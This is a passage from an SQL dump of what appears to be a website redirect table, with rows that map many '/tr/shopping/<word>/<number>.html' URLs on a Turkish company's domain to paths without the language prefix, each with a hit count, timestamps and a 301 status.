00:00:00',301),(72302,'https://3s-technologies.com.tr/tr/shopping/palatalize/3862372577.html',NULL,'https://3s-technologies.com.tr/shopping/palatalize/3862372577.html','',1,0,'2026-06-11 04:33:30','0000-00-00 00:00:00',301),(72303,'https://3s-technologies.com.tr/tr/shopping/connection/1873706410.html',NULL,'https://3s-technologies.com.tr/shopping/connection/1873706410.html','',1,0,'2026-06-11 04:33:33','0000-00-00 00:00:00',301),(72304,'https://3s-technologies.com.tr/tr/shopping/telepathist/1291820988.html',NULL,'https://3s-technologies.com.tr/shopping/telepathist/1291820988.html','',1,0,'2026-06-11 04:33:36','0000-00-00 00:00:00',301),(72305,'https://3s-technologies.com.tr/tr/shopping/boylike/110156114.html',NULL,'https://3s-technologies.com.tr/shopping/boylike/110156114.html','',1,0,'2026-06-11 04:33:39','0000-00-00 00:00:00',301),(72306,'https://3s-technologies.com.tr/tr/shopping/economizing/905347625.html',NULL,'https://3s-technologies.com.tr/shopping/economizing/905347625.html','',1,0,'2026-06-11 04:33:45','0000-00-00 00:00:00',301),(72307,'https://3s-technologies.com.tr/tr/shopping/dioscorea/2545299413.html',NULL,'https://3s-technologies.com.tr/shopping/dioscorea/2545299413.html','',1,0,'2026-06-11 04:33:47','0000-00-00 00:00:00',301),(72308,'https://3s-technologies.com.tr/tr/shopping/heimdallr/1165566522.html',NULL,'https://3s-technologies.com.tr/shopping/heimdallr/1165566522.html','',1,0,'2026-06-11 04:33:50','0000-00-00 00:00:00',301),(72309,'https://3s-technologies.com.tr/tr/shopping/boustrophedonic/3249809331.html',NULL,'https://3s-technologies.com.tr/shopping/boustrophedonic/3249809331.html','',1,0,'2026-06-11 04:33:53','0000-00-00 00:00:00',301),(72310,'https://3s-technologies.com.tr/tr/shopping/scandalously/4149493285.html',NULL,'https://3s-technologies.com.tr/shopping/scandalously/4149493285.html','',1,0,'2026-06-11 04:33:56','0000-00-00 00:00:00',301),(72311,'https://3s-technologies.com.tr/tr/shopping/inhalent/1287232184.html',NULL,'https://3s-technologies.com.tr/shopping/inhalent/1287232184.html','',1,0,'2026-06-11 04:33:59','0000-00-00 00:00:00',301),(72312,'https://3s-technologies.com.tr/tr/shopping/rhymeless/4031418528.html',NULL,'https://3s-technologies.com.tr/shopping/rhymeless/4031418528.html','',1,0,'2026-06-11 04:34:02','0000-00-00 00:00:00',301),(72313,'https://3s-technologies.com.tr/tr/shopping/overwalk/4251475780.html',NULL,'https://3s-technologies.com.tr/shopping/overwalk/4251475780.html','',1,0,'2026-06-11 04:34:05','0000-00-00 00:00:00',301),(72314,'https://3s-technologies.com.tr/tr/shopping/swerved/4037382922.html',NULL,'https://3s-technologies.com.tr/shopping/swerved/4037382922.html','',1,0,'2026-06-11 04:34:08','0000-00-00 00:00:00',301),(72315,'https://3s-technologies.com.tr/tr/shopping/chubbed/261123930.html',NULL,'https://3s-technologies.com.tr/shopping/chubbed/261123930.html','',1,0,'2026-06-11 04:34:11','0000-00-00 00:00:00',301),(72316,'https://3s-technologies.com.tr/tr/shopping/aestrelata/4084367192.html',NULL,'https://3s-technologies.com.tr/shopping/aestrelata/4084367192.html','',1,0,'2026-06-11 04:34:14','0000-00-00 00:00:00',301),(72317,'https://3s-technologies.com.tr/tr/shopping/whitebait/1863153228.html',NULL,'https://3s-technologies.com.tr/shopping/whitebait/1863153228.html','',1,0,'2026-06-11 04:34:17','0000-00-00 00:00:00',301),(72318,'https://3s-technologies.com.tr/tr/shopping/hydrostatics/2857978723.html',NULL,'https://3s-technologies.com.tr/shopping/hydrostatics/2857978723.html','',1,0,'2026-06-11 04:34:20','0000-00-00 00:00:00',301),(72319,'https://3s-technologies.com.tr/tr/shopping/fabricked/2671553863.html',NULL,'https://3s-technologies.com.tr/shopping/fabricked/2671553863.html','',1,0,'2026-06-11 04:34:23','0000-00-00 00:00:00',301),(72320,'https://3s-technologies.com.tr/tr/shopping/memorialize/1118911497.html',NULL,'https://3s-technologies.com.tr/shopping/memorialize/1118911497.html','',1,0,'2026-06-11 04:34:26','0000-00-00 00:00:00',301),(72321,'https://3s-technologies.com.tr/tr/shopping/unhumanize/3330107114.html',NULL,'https://3s-technologies.com.tr/shopping/unhumanize/3330107114.html','',1,0,'2026-06-11 04:34:29','0000-00-00 00:00:00',301),(72322,'https://3s-technologies.com.tr/tr/shopping/paraph/2584109291.html',NULL,'https://3s-technologies.com.tr/shopping/paraph/2584109291.html','',1,0,'2026-06-11 04:34:32','0000-00-00 00:00:00',301),(72323,'https://3s-technologies.com.tr/tr/shopping/mayoress/1822133352.html',NULL,'https://3s-technologies.com.tr/shopping/mayoress/1822133352.html','',1,0,'2026-06-11 04:34:38','0000-00-00 00:00:00',301),(72324,'https://3s-technologies.com.tr/tr/shopping/blamer/1096640625.html',NULL,'https://3s-technologies.com.tr/shopping/blamer/1096640625.html','',1,0,'2026-06-11 04:34:41','0000-00-00 00:00:00',301),(72325,'https://3s-technologies.com.tr/tr/shopping/winterana/3934284429.html',NULL,'https://3s-technologies.com.tr/shopping/winterana/3934284429.html','',1,0,'2026-06-11 04:34:44','0000-00-00 00:00:00',301),(72326,'https://3s-technologies.com.tr/tr/shopping/alkalifiable/2304346895.html',NULL,'https://3s-technologies.com.tr/shopping/alkalifiable/2304346895.html','',1,0,'2026-06-11 04:34:47','0000-00-00 00:00:00',301),(72327,'https://3s-technologies.com.tr/tr/shopping/manlike/2823875764.html',NULL,'https://3s-technologies.com.tr/shopping/manlike/2823875764.html','',1,0,'2026-06-11 04:34:50','0000-00-00 00:00:00',301),(72328,'https://3s-technologies.com.tr/tr/shopping/currie/3573408750.html',NULL,'https://3s-technologies.com.tr/shopping/currie/3573408750.html','',1,0,'2026-06-11 04:34:53','0000-00-00 00:00:00',301),(72329,'https://3s-technologies.com.tr/tr/shopping/cooption/3612004412.html',NULL,'https://3s-technologies.com.tr/shopping/cooption/3612004412.html','',1,0,'2026-06-11 04:34:56','0000-00-00 00:00:00',301),(72330,'https://3s-technologies.com.tr/tr/shopping/leafnosed/2699881989.html',NULL,'https://3s-technologies.com.tr/shopping/leafnosed/2699881989.html','',1,0,'2026-06-11 04:34:59','0000-00-00 00:00:00',301),(72331,'https://3s-technologies.com.tr/tr/shopping/venosus/1649060370.html',NULL,'https://3s-technologies.com.tr/shopping/venosus/1649060370.html','',1,0,'2026-06-11 04:35:02','0000-00-00 00:00:00',301),(72332,'https://3s-technologies.com.tr/tr/shopping/omniscient/779700324.html',NULL,'https://3s-technologies.com.tr/shopping/omniscient/779700324.html','',1,0,'2026-06-11 04:35:06','0000-00-00 00:00:00',301),(72333,'https://3s-technologies.com.tr/tr/shopping/sphenography/1181709477.html',NULL,'https://3s-technologies.com.tr/shopping/sphenography/1181709477.html','',1,0,'2026-06-11 04:35:10','0000-00-00 00:00:00',301),(72334,'https://3s-technologies.com.tr/tr/shopping/figural/139835991.html',NULL,'https://3s-technologies.com.tr/shopping/figural/139835991.html','',1,0,'2026-06-11 04:35:12','0000-00-00 00:00:00',301),(72335,'https://3s-technologies.com.tr/tr/shopping/distriction/3391158176.html',NULL,'https://3s-technologies.com.tr/shopping/distriction/3391158176.html','',1,0,'2026-06-11 04:35:15','0000-00-00 00:00:00',301),(72336,'https://3s-technologies.com.tr/tr/shopping/formicidae/975605967.html',NULL,'https://3s-technologies.com.tr/shopping/formicidae/975605967.html','',1,0,'2026-06-11 04:35:18','0000-00-00 00:00:00',301),(72337,'https://3s-technologies.com.tr/tr/shopping/allusiveness/2098470581.html',NULL,'https://3s-technologies.com.tr/shopping/allusiveness/2098470581.html','',1,0,'2026-06-11 04:35:21','0000-00-00 00:00:00',301),(72338,'https://3s-technologies.com.tr/tr/shopping/figgum/2856766640.html',NULL,'https://3s-technologies.com.tr/shopping/figgum/2856766640.html','',1,0,'2026-06-11 04:35:24','0000-00-00 00:00:00',301),(72339,'https://3s-technologies.com.tr/tr/shopping/potsherd/3037968638.html',NULL,'https://3s-technologies.com.tr/shopping/potsherd/3037968638.html','',1,0,'2026-06-11 04:35:27','0000-00-00 00:00:00',301),(72340,'https://3s-technologies.com.tr/tr/shopping/placeless/1605801388.html',NULL,'https://3s-technologies.com.tr/shopping/placeless/1605801388.html','',1,0,'2026-06-11 04:35:30','0000-00-00 00:00:00',301),(72341,'https://3s-technologies.com.tr/tr/shopping/pamper/1453294411.html',NULL,'https://3s-technologies.com.tr/shopping/pamper/1453294411.html','',1,0,'2026-06-11 04:35:33','0000-00-00 00:00:00',301),(72342,'https://3s-technologies.com.tr/tr/shopping/candymaker/3011534276.html',NULL,'https://3s-technologies.com.tr/shopping/candymaker/3011534276.html','',1,0,'2026-06-11 04:35:36','0000-00-00 00:00:00',301),(72343,'https://3s-technologies.com.tr/tr/shopping/lucratively/3486962061.html',NULL,'https://3s-technologies.com.tr/shopping/lucratively/3486962061.html','',1,0,'2026-06-11 04:35:39','0000-00-00 00:00:00',301),(72344,'https://3s-technologies.com.tr/tr/shopping/epizeuxis/149177106.html',NULL,'https://3s-technologies.com.tr/shopping/epizeuxis/149177106.html','',1,0,'2026-06-11 04:35:42','0000-00-00 00:00:00',301),(72345,'https://3s-technologies.com.tr/tr/shopping/tearpit/3805605765.html',NULL,'https://3s-technologies.com.tr/shopping/tearpit/3805605765.html','',1,0,'2026-06-11 04:35:45','0000-00-00 00:00:00',301),(72346,'https://3s-technologies.com.tr/tr/shopping/waferer/2238235914.html',NULL,'https://3s-technologies.com.tr/shopping/waferer/2238235914.html','',1,0,'2026-06-11 04:35:48','0000-00-00 00:00:00',301),(72347,'https://3s-technologies.com.tr/tr/shopping/professoriate/164549389.html',NULL,'https://3s-technologies.com.tr/shopping/professoriate/164549389.html','',1,0,'2026-06-11 04:35:51','0000-00-00 00:00:00',301),(72348,'https://3s-technologies.com.tr/tr/shopping/madheaded/887387621.html',NULL,'https://3s-technologies.com.tr/shopping/madheaded/887387621.html','',1,0,'2026-06-11 04:35:54','0000-00-00 00:00:00',301),(72349,'https://3s-technologies.com.tr/tr/shopping/accredited/1474794611.html',NULL,'https://3s-technologies.com.tr/shopping/accredited/1474794611.html','',1,0,'2026-06-11 04:35:57','0000-00-00 00:00:00',301),(72350,'https://3s-technologies.com.tr/tr/shopping/tithingmen/3755170290.html',NULL,'https://3s-technologies.com.tr/shopping/tithingmen/3755170290.html','',1,0,'2026-06-11 04:36:00','0000-00-00 00:00:00',301),(72351,'https://3s-technologies.com.tr/tr/shopping/fontal/93849620.html',NULL,'https://3s-technologies.com.tr/shopping/fontal/93849620.html','',1,0,'2026-06-11 04:36:03','0000-00-00 00:00:00',301),(72352,'https://3s-technologies.com.tr/tr/shopping/nonattention/3928483526.html',NULL,'https://3s-technologies.com.tr/shopping/nonattention/3928483526.html','',1,0,'2026-06-11 04:36:06','0000-00-00 00:00:00',301),(72353,'https://3s-technologies.com.tr/tr/shopping/elapid/4273583145.html',NULL,'https://3s-technologies.com.tr/shopping/elapid/4273583145.html','',1,0,'2026-06-11 04:36:09','0000-00-00 00:00:00',301),(72354,'https://3s-technologies.com.tr/tr/shopping/proteron/1801403824.html',NULL,'https://3s-technologies.com.tr/shopping/proteron/1801403824.html','',1,0,'2026-06-11 04:36:12','0000-00-00 00:00:00',301),(72355,'https://3s-technologies.com.tr/tr/shopping/hythe/1670560570.html',NULL,'https://3s-technologies.com.tr/shopping/hythe/1670560570.html','',1,0,'2026-06-11 04:36:15','0000-00-00 00:00:00',301),(72356,'https://3s-technologies.com.tr/tr/shopping/astur/601267866.html',NULL,'https://3s-technologies.com.tr/shopping/astur/601267866.html','',1,0,'2026-06-11 04:36:18','0000-00-00 00:00:00',301),(72357,'https://3s-technologies.com.tr/tr/shopping/epipremnum/1180497394.html',NULL,'https://3s-technologies.com.tr/shopping/epipremnum/1180497394.html','',1,0,'2026-06-11 04:36:22','0000-00-00 00:00:00',301),(72358,'https://3s-technologies.com.tr/tr/shopping/nymphe/21547018.html',NULL,'https://3s-technologies.com.tr/shopping/nymphe/21547018.html','',1,0,'2026-06-11 04:36:24','0000-00-00 00:00:00',301),(72359,'https://3s-technologies.com.tr/tr/shopping/cordiality/3462085140.html',NULL,'https://3s-technologies.com.tr/shopping/cordiality/3462085140.html','',1,0,'2026-06-11 04:36:29','0000-00-00 00:00:00',301),(72360,'https://3s-technologies.com.tr/tr/shopping/overheat/2934870129.html',NULL,'https://3s-technologies.com.tr/shopping/overheat/2934870129.html','',1,0,'2026-06-11 04:36:31','0000-00-00 00:00:00',301),(72361,'https://3s-technologies.com.tr/tr/shopping/distortive/1164354423.html',NULL,'https://3s-technologies.com.tr/shopping/distortive/1164354423.html','',1,0,'2026-06-11 04:36:34','0000-00-00 00:00:00',301),(72362,'https://3s-technologies.com.tr/tr/shopping/noble/1280055691.html',NULL,'https://3s-technologies.com.tr/shopping/noble/1280055691.html','',1,0,'2026-06-11 04:36:37','0000-00-00 00:00:00',301),(72363,'https://3s-technologies.com.tr/tr/shopping/ferre/728734431.html',NULL,'https://3s-technologies.com.tr/shopping/ferre/728734431.html','',1,0,'2026-06-11 04:36:40','0000-00-00 00:00:00',301),(72364,'https://3s-technologies.com.tr/tr/shopping/leasy/2278043691.html',NULL,'https://3s-technologies.com.tr/shopping/leasy/2278043691.html','',1,0,'2026-06-11 04:36:43','0000-00-00 00:00:00',301),(72365,'https://3s-technologies.com.tr/tr/shopping/uniped/1311504155.html',NULL,'https://3s-technologies.com.tr/shopping/uniped/1311504155.html','',1,0,'2026-06-11 04:36:46','0000-00-00 00:00:00',301),(72366,'https://3s-technologies.com.tr/tr/shopping/fineness/4057507532.html',NULL,'https://3s-technologies.com.tr/shopping/fineness/4057507532.html','',1,0,'2026-06-11 04:36:49','0000-00-00 00:00:00',301),(72367,'https://3s-technologies.com.tr/tr/shopping/narrowed/2361113691.html',NULL,'https://3s-technologies.com.tr/shopping/narrowed/2361113691.html','',1,0,'2026-06-11 04:36:52','0000-00-00 00:00:00',301),(72368,'https://3s-technologies.com.tr/tr/shopping/hydraulical/740845070.html',NULL,'https://3s-technologies.com.tr/shopping/hydraulical/740845070.html','',1,0,'2026-06-11 04:36:55','0000-00-00 00:00:00',301),(72369,'https://3s-technologies.com.tr/tr/shopping/tylari/766934058.html',NULL,'https://3s-technologies.com.tr/shopping/tylari/766934058.html','',1,0,'2026-06-11 04:36:58','0000-00-00 00:00:00',301),(72370,'https://3s-technologies.com.tr/tr/shopping/accipitres/2918727158.html',NULL,'https://3s-technologies.com.tr/shopping/accipitres/2918727158.html','',1,0,'2026-06-11 04:37:01','0000-00-00 00:00:00',301),(72371,'https://3s-technologies.com.tr/tr/shopping/somewhile/1185249689.html',NULL,'https://3s-technologies.com.tr/shopping/somewhile/1185249689.html','',1,0,'2026-06-11 04:37:04','0000-00-00 00:00:00',301),(72372,'https://3s-technologies.com.tr/tr/shopping/vocalist/3228309131.html',NULL,'https://3s-technologies.com.tr/shopping/vocalist/3228309131.html','',1,0,'2026-06-11 04:37:07','0000-00-00 00:00:00',301),(72373,'https://3s-technologies.com.tr/tr/shopping/imbanking/1629540710.html',NULL,'https://3s-technologies.com.tr/shopping/imbanking/1629540710.html','',1,0,'2026-06-11 04:37:10','0000-00-00 00:00:00',301),(72374,'https://3s-technologies.com.tr/tr/shopping/brutally/2567802813.html',NULL,'https://3s-technologies.com.tr/shopping/brutally/2567802813.html','',1,0,'2026-06-11 04:37:13','0000-00-00 00:00:00',301),(72375,'https://3s-technologies.com.tr/tr/shopping/pelagic/2725529582.html',NULL,'https://3s-technologies.com.tr/shopping/pelagic/2725529582.html','',1,0,'2026-06-11 04:37:16','0000-00-00 00:00:00',301),(72376,'https://3s-technologies.com.tr/tr/shopping/drearihead/4108309918.html',NULL,'https://3s-technologies.com.tr/shopping/drearihead/4108309918.html','',1,0,'2026-06-11 04:37:23','0000-00-00 00:00:00',301),(72377,'https://3s-technologies.com.tr/tr/shopping/romeward/2096305991.html',NULL,'https://3s-technologies.com.tr/shopping/romeward/2096305991.html','',1,0,'2026-06-11 04:37:27','0000-00-00 00:00:00',301),(72378,'https://3s-technologies.com.tr/tr/shopping/decrepitness/1722575071.html',NULL,'https://3s-technologies.com.tr/shopping/decrepitness/1722575071.html','',1,0,'2026-06-11 04:37:31','0000-00-00 00:00:00',301),(72379,'https://3s-technologies.com.tr/tr/shopping/stegnosis/1135659402.html',NULL,'https://3s-technologies.com.tr/shopping/stegnosis/1135659402.html','',1,0,'2026-06-11 04:37:33','0000-00-00 00:00:00',301),(72380,'https://3s-technologies.com.tr/tr/shopping/hydrokinetic/3120433672.html',NULL,'https://3s-technologies.com.tr/shopping/hydrokinetic/3120433672.html','',1,0,'2026-06-11 04:37:36','0000-00-00 00:00:00',301),(72381,'https://3s-technologies.com.tr/tr/shopping/herpetic/1972052624.html',NULL,'https://3s-technologies.com.tr/shopping/herpetic/1972052624.html','',1,0,'2026-06-11 04:37:39','0000-00-00 00:00:00',301),(72382,'https://3s-technologies.com.tr/tr/shopping/palamae/2643645627.html',NULL,'https://3s-technologies.com.tr/shopping/palamae/2643645627.html','',1,0,'2026-06-11 04:37:42','0000-00-00 00:00:00',301),(72383,'https://3s-technologies.com.tr/tr/shopping/intermundane/2935033636.html',NULL,'https://3s-technologies.com.tr/shopping/intermundane/2935033636.html','',1,0,'2026-06-11 04:37:45','0000-00-00 00:00:00',301),(72384,'https://3s-technologies.com.tr/tr/shopping/aligerous/3165435171.html',NULL,'https://3s-technologies.com.tr/shopping/aligerous/3165435171.html','',1,0,'2026-06-11 04:37:49','0000-00-00 00:00:00',301),(72385,'https://3s-technologies.com.tr/tr/shopping/isotherombrose/1753370978.html',NULL,'https://3s-technologies.com.tr/shopping/isotherombrose/1753370978.html','',1,0,'2026-06-11 04:37:52','0000-00-00 00:00:00',301),(72386,'https://3s-technologies.com.tr/tr/shopping/hucho/2896014859.html',NULL,'https://3s-technologies.com.tr/shopping/hucho/2896014859.html','',1,0,'2026-06-11 04:37:54','0000-00-00 00:00:00',301),(72387,'https://3s-technologies.com.tr/tr/shopping/proslavery/3935400443.html',NULL,'https://3s-technologies.com.tr/shopping/proslavery/3935400443.html','',1,0,'2026-06-11 04:37:58','0000-00-00 00:00:00',301),(72388,'https://3s-technologies.com.tr/tr/shopping/catalytic/2648234415.html',NULL,'https://3s-technologies.com.tr/shopping/catalytic/2648234415.html','',1,0,'2026-06-11 04:38:01','0000-00-00 00:00:00',301),(72389,'https://3s-technologies.com.tr/tr/shopping/dumasin/1483137811.html',NULL,'https://3s-technologies.com.tr/shopping/dumasin/1483137811.html','',1,0,'2026-06-11 04:38:03','0000-00-00 00:00:00',301),(72390,'https://3s-technologies.com.tr/tr/shopping/chorography/661411351.html',NULL,'https://3s-technologies.com.tr/shopping/chorography/661411351.html','',1,0,'2026-06-11 04:38:07','0000-00-00 00:00:00',301),(72391,'https://3s-technologies.com.tr/tr/shopping/steatite/3212419457.html',NULL,'https://3s-technologies.com.tr/shopping/steatite/3212419457.html','',1,0,'2026-06-11 04:38:09','0000-00-00 00:00:00',301),(72392,'https://3s-technologies.com.tr/tr/shopping/rhumb/3491928572.html',NULL,'https://3s-technologies.com.tr/shopping/rhumb/3491928572.html','',1,0,'2026-06-11 04:38:13','0000-00-00 00:00:00',301),(72393,'https://3s-technologies.com.tr/tr/shopping/snowball/1539693477.html',NULL,'https://3s-technologies.com.tr/shopping/snowball/1539693477.html','',1,0,'2026-06-11 04:38:16','0000-00-00 00:00:00',301),(72394,'https://3s-technologies.com.tr/tr/shopping/immaterially/2422635868.html',NULL,'https://3s-technologies.com.tr/shopping/immaterially/2422635868.html','',1,0,'2026-06-11 04:38:19','0000-00-00 00:00:00',301),(72395,'https://3s-technologies.com.tr/tr/shopping/connotational/558872400.html',NULL,'https://3s-technologies.com.tr/shopping/connotational/558872400.html','',1,0,'2026-06-11 04:38:22','0000-00-00 00:00:00',301),(72396,'https://3s-technologies.com.tr/tr/shopping/quartzose/3163010989.html',NULL,'https://3s-technologies.com.tr/shopping/quartzose/3163010989.html','',1,0,'2026-06-11 04:38:25','0000-00-00 00:00:00',301),(72397,'https://3s-technologies.com.tr/tr/shopping/atropos/3015074488.html',NULL,'https://3s-technologies.com.tr/shopping/atropos/3015074488.html','',1,0,'2026-06-11 04:38:28','0000-00-00 00:00:00',301),(72398,'https://3s-technologies.com.tr/tr/shopping/colliquation/870688210.html',NULL,'https://3s-technologies.com.tr/shopping/colliquation/870688210.html','',1,0,'2026-06-11 04:38:31','0000-00-00 00:00:00',301),(72399,'https://3s-technologies.com.tr/tr/shopping/cloths/2091553696.html',NULL,'https://3s-technologies.com.tr/shopping/cloths/2091553696.html','',1,0,'2026-06-11 04:38:33','0000-00-00 00:00:00',301),(72400,'https://3s-technologies.com.tr/tr/shopping/potently/2498315143.html',NULL,'https://3s-technologies.com.tr/shopping/potently/2498315143.html','',1,0,'2026-06-11 04:38:37','0000-00-00 00:00:00',301),(72401,'https://3s-technologies.com.tr/tr/shopping/anguillula/2548676102.html',NULL,'https://3s-technologies.com.tr/shopping/anguillula/2548676102.html','',1,0,'2026-06-11 04:38:40','0000-00-00 00:00:00',301),(72402,'https://3s-technologies.com.tr/tr/shopping/cinnamonea/615802719.html',NULL,'https://3s-technologies.com.tr/shopping/cinnamonea/615802719.html','',1,0,'2026-06-11 04:38:43','0000-00-00 00:00:00',301),(72403,'https://3s-technologies.com.tr/tr/shopping/hammerkop/1135495879.html',NULL,'https://3s-technologies.com.tr/shopping/hammerkop/1135495879.html','',1,0,'2026-06-11 04:38:46','0000-00-00 00:00:00',301),(72404,'https://3s-technologies.com.tr/tr/shopping/nicotinism/2588698079.html',NULL,'https://3s-technologies.com.tr/shopping/nicotinism/2588698079.html','',1,0,'2026-06-11 04:38:49','0000-00-00 00:00:00',301),(72405,'https://3s-technologies.com.tr/tr/shopping/wateringpot/3489386243.html',NULL,'https://3s-technologies.com.tr/shopping/wateringpot/3489386243.html','',1,0,'2026-06-11 04:38:52','0000-00-00 00:00:00',301),(72406,'https://3s-technologies.com.tr/tr/shopping/curvinerved/1639930401.html',NULL,'https://3s-technologies.com.tr/shopping/curvinerved/1639930401.html','',1,0,'2026-06-11 04:38:55','0000-00-00 00:00:00',301),(72407,'https://3s-technologies.com.tr/tr/shopping/motacilloides/1062068753.html',NULL,'https://3s-technologies.com.tr/shopping/motacilloides/1062068753.html','',1,0,'2026-06-11 04:38:58','0000-00-00 00:00:00',301),(72408,'https://3s-technologies.com.tr/tr/shopping/sarcophile/2578519534.html',NULL,'https://3s-technologies.com.tr/shopping/sarcophile/2578519534.html','',1,0,'2026-06-11 04:39:00','0000-00-00 00:00:00',301),(72409,'https://3s-technologies.com.tr/tr/shopping/sankha/2022627767.html',NULL,'https://3s-technologies.com.tr/shopping/sankha/2022627767.html','',1,0,'2026-06-11 04:39:04','0000-00-00 00:00:00',301),(72410,'https://3s-technologies.com.tr/tr/shopping/outscout/543500101.html',NULL,'https://3s-technologies.com.tr/shopping/outscout/543500101.html','',1,0,'2026-06-11 04:39:07','0000-00-00 00:00:00',301),(72411,'https://3s-technologies.com.tr/tr/shopping/telotrochae/1794650446.html',NULL,'https://3s-technologies.com.tr/shopping/telotrochae/1794650446.html','',1,0,'2026-06-11 04:39:10','0000-00-00 00:00:00',301),(72412,'https://3s-technologies.com.tr/tr/shopping/unproficiency/1522945572.html',NULL,'https://3s-technologies.com.tr/shopping/unproficiency/1522945572.html','',1,0,'2026-06-11 04:39:13','0000-00-00 00:00:00',301),(72413,'https://3s-technologies.com.tr/tr/shopping/discoure/2279255790.html',NULL,'https://3s-technologies.com.tr/shopping/discoure/2279255790.html','',1,0,'2026-06-11 04:39:17','0000-00-00 00:00:00',301),(72414,'https://3s-technologies.com.tr/tr/shopping/slanderer/1257325064.html',NULL,'https://3s-technologies.com.tr/shopping/slanderer/1257325064.html','',1,0,'2026-06-11 04:39:20','0000-00-00 00:00:00',301),(72415,'https://3s-technologies.com.tr/tr/shopping/creissant/2701094088.html',NULL,'https://3s-technologies.com.tr/shopping/creissant/2701094088.html','',1,0,'2026-06-11 04:39:23','0000-00-00 00:00:00',301),(72416,'https://3s-technologies.com.tr/tr/shopping/schizomycetes/3302776307.html',NULL,'https://3s-technologies.com.tr/shopping/schizomycetes/3302776307.html','',1,0,'2026-06-11 04:39:26','0000-00-00 00:00:00',301),(72417,'https://3s-technologies.com.tr/tr/shopping/registrar/77101715.html',NULL,'https://3s-technologies.com.tr/shopping/registrar/77101715.html','',1,0,'2026-06-11 04:39:29','0000-00-00 00:00:00',301),(72418,'https://3s-technologies.com.tr/tr/shopping/divineress/3992608650.html',NULL,'https://3s-technologies.com.tr/shopping/divineress/3992608650.html','',1,0,'2026-06-11 04:39:32','0000-00-00 00:00:00',301),(72419,'https://3s-technologies.com.tr/tr/shopping/osmorrhiza/3567607847.html',NULL,'https://3s-technologies.com.tr/shopping/osmorrhiza/3567607847.html','',1,0,'2026-06-11 04:39:35','0000-00-00 00:00:00',301),(72420,'https://3s-technologies.com.tr/tr/shopping/southron/904135526.html',NULL,'https://3s-technologies.com.tr/shopping/southron/904135526.html','',1,0,'2026-06-11 04:39:38','0000-00-00 00:00:00',301),(72421,'https://3s-technologies.com.tr/tr/shopping/portigue/3222508228.html',NULL,'https://3s-technologies.com.tr/shopping/portigue/3222508228.html','',1,0,'2026-06-11 04:39:41','0000-00-00 00:00:00',301),(72422,'https://3s-technologies.com.tr/tr/shopping/chopsticks/2785903348.html',NULL,'https://3s-technologies.com.tr/shopping/chopsticks/2785903348.html','',1,0,'2026-06-11 04:39:44','0000-00-00 00:00:00',301),(72423,'https://3s-technologies.com.tr/tr/shopping/lavaret/3859784840.html',NULL,'https://3s-technologies.com.tr/shopping/lavaret/3859784840.html','',1,0,'2026-06-11 04:39:47','0000-00-00 00:00:00',301),(72424,'https://3s-technologies.com.tr/tr/shopping/swimmeret/3674738688.html',NULL,'https://3s-technologies.com.tr/shopping/swimmeret/3674738688.html','',1,0,'2026-06-11 04:39:50','0000-00-00 00:00:00',301),(72425,'https://3s-technologies.com.tr/tr/shopping/fanwort/3229521230.html',NULL,'https://3s-technologies.com.tr/shopping/fanwort/3229521230.html','',1,0,'2026-06-11 04:39:53','0000-00-00 00:00:00',301),(72426,'https://3s-technologies.com.tr/tr/shopping/neogamist/4180385293.html',NULL,'https://3s-technologies.com.tr/shopping/neogamist/4180385293.html','',1,0,'2026-06-11 04:39:56','0000-00-00 00:00:00',301),(72427,'https://3s-technologies.com.tr/tr/shopping/terseness/1181873000.html',NULL,'https://3s-technologies.com.tr/shopping/terseness/1181873000.html','',1,0,'2026-06-11 04:39:59','0000-00-00 00:00:00',301),(72428,'https://3s-technologies.com.tr/tr/shopping/tawse/2840460162.html',NULL,'https://3s-technologies.com.tr/shopping/tawse/2840460162.html','',1,0,'2026-06-11 04:40:02','0000-00-00 00:00:00',301),(72429,'https://3s-technologies.com.tr/tr/shopping/paraplegia/4148281202.html',NULL,'https://3s-technologies.com.tr/shopping/paraplegia/4148281202.html','',1,0,'2026-06-11 04:40:05','0000-00-00 00:00:00',301),(72430,'https://3s-technologies.com.tr/tr/shopping/fissiparism/2378814071.html',NULL,'https://3s-technologies.com.tr/shopping/fissiparism/2378814071.html','',1,0,'2026-06-11 04:40:08','0000-00-00 00:00:00',301),(72431,'https://3s-technologies.com.tr/tr/shopping/maniglion/2926655217.html',NULL,'https://3s-technologies.com.tr/shopping/maniglion/2926655217.html','',1,0,'2026-06-11 04:40:12','0000-00-00 00:00:00',301),(72432,'https://3s-technologies.com.tr/tr/shopping/inosculate/2154262774.html',NULL,'https://3s-technologies.com.tr/shopping/inosculate/2154262774.html','',1,0,'2026-06-11 04:40:14','0000-00-00 00:00:00',301),(72433,'https://3s-technologies.com.tr/tr/shopping/shrivelling/1662182135.html',NULL,'https://3s-technologies.com.tr/shopping/shrivelling/1662182135.html','',1,0,'2026-06-11 04:40:17','0000-00-00 00:00:00',301),(72434,'https://3s-technologies.com.tr/tr/shopping/periastral/2360142062.html',NULL,'https://3s-technologies.com.tr/shopping/periastral/2360142062.html','',1,0,'2026-06-11 04:40:20','0000-00-00 00:00:00',301),(72435,'https://3s-technologies.com.tr/tr/shopping/carolina/3172592558.html',NULL,'https://3s-technologies.com.tr/shopping/carolina/3172592558.html','',1,0,'2026-06-11 04:40:23','0000-00-00 00:00:00',301),(72436,'https://3s-technologies.com.tr/tr/shopping/dearth/2706876637.html',NULL,'https://3s-technologies.com.tr/shopping/dearth/2706876637.html','',1,0,'2026-06-11 04:40:26','0000-00-00 00:00:00',301),(72437,'https://3s-technologies.com.tr/tr/shopping/femerell/1901039852.html',NULL,'https://3s-technologies.com.tr/shopping/femerell/1901039852.html','',1,0,'2026-06-11 04:40:29','0000-00-00 00:00:00',301),(72438,'https://3s-technologies.com.tr/tr/shopping/retrenchment/547347937.html',NULL,'https://3s-technologies.com.tr/shopping/retrenchment/547347937.html','',1,0,'2026-06-11 04:40:32','0000-00-00 00:00:00',301),(72439,'https://3s-technologies.com.tr/tr/shopping/beslave/2611410378.html',NULL,'https://3s-technologies.com.tr/shopping/beslave/2611410378.html','',1,0,'2026-06-11 04:40:37','0000-00-00 00:00:00',301),(72440,'https://3s-technologies.com.tr/tr/shopping/promulgator/1645683681.html',NULL,'https://3s-technologies.com.tr/shopping/promulgator/1645683681.html','',1,0,'2026-06-11 04:40:39','0000-00-00 00:00:00',301),(72441,'https://3s-technologies.com.tr/tr/shopping/reinsure/3510841067.html',NULL,'https://3s-technologies.com.tr/shopping/reinsure/3510841067.html','',1,0,'2026-06-11 04:40:42','0000-00-00 00:00:00',301),(72442,'https://3s-technologies.com.tr/tr/shopping/besprinkler/195997853.html',NULL,'https://3s-technologies.com.tr/shopping/besprinkler/195997853.html','',1,0,'2026-06-11 